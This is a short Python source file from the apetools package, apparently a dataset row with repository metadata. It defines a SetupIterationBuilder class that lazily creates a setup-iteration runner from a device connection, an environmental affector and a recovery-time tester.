] | null | null | null | apetools/builders/subbuilders/setupiterationbuilder.py | rsnakamura/oldape | b4d1c77e1d611fe2b30768b42bdc7493afb0ea95 | [
"Apache-2.0"
] | null | null | null |
from apetools.tools import setupiteration
class SetupIterationBuilder(object):
"""
A SetupIterationBuilder builds Setup Iteration runners
"""
def __init__(self, device, affector, time_to_recovery):
"""
:param:
- `device`: A connection to the DUT
- `affector`: An environmental affector
- `time_to_recovery`: A time to recovery tester
"""
self.device = device
self.affector = affector
self.time_to_recovery = time_to_recovery
self._setup = None
return
@property
def setup(self):
"""
:return: A setup iteration runner
"""
if self._setup is None:
self._setup = setupiteration.SetupIteration(device=self.device,
time_to_recovery=self.time_to_recovery,
affector=self.affector)
return self._setup
# end class SetupIterationBuilder
| 28.971429 | 95 | 0.565089 | 95 | 1,014 | 5.821053 | 0.368421 | 0.075949 | 0.177215 | 0.079566 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.362919 | 1,014 | 34 | 96 | 29.823529 | 0.856037 | 0.253452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.066667 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |